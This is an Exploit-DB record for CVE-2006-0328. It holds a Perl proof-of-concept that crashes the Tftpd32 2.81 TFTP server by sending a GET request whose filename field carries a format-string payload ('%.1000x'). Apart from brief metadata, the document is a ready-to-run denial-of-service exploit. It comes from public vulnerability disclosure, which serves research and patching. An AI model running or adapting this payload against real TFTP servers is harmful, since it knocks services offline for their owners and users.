Tftpd32 2.81 - GET Request Format String Denial of Service PoC

2006-01-19T00:00:00
ID EDB-ID:1424
Type exploitdb
Reporter Critical Security
Modified 2006-01-19T00:00:00

Description

Tftpd32 2.81 (GET Request) Format String Denial of Service PoC. CVE-2006-0328. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "\x00\x01" ;   #GET
$bzz .= "%.1000x\x00";
$bzz .= "\x6F\x63\x74\x65\x74\x00"; #octet
$tftpudp->send($bzz);

# milw0rm.com [2006-01-19]